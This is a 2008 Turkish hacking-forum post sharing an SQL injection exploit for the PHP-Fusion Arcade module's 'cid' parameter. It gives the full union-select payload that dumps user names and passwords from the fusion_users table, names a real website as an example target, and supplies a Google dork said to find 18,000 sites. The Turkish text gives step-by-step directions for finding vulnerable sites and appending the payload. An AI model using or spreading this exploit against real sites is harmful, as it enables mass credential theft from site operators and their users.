hacked MASTER
Mesaj Sayısı : 199 Kayıt tarihi : 08/03/08
| Konu: exploit PHP-FUSION Arcade Module (cid) Remote SQL Injection Salı Mart 11, 2008 12:13 am | |
| PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
--------------------------------
Exploit:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
--------------------------------
Exapmle: http://www.basicwallpapers.dk/infusions/arcade/
--------------------------------
Google Dork: /infusions/arcade/ 18.000 sites
--------------------------------
kısaca googlede /infusions/arcade/ şeklinde aratıyoruz (arama yollarını genişletebiliriz)
url adresinde arama yaptığımız klasör olan sitelerin ucuna index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/* kodumuzu ekliyoruz | |
|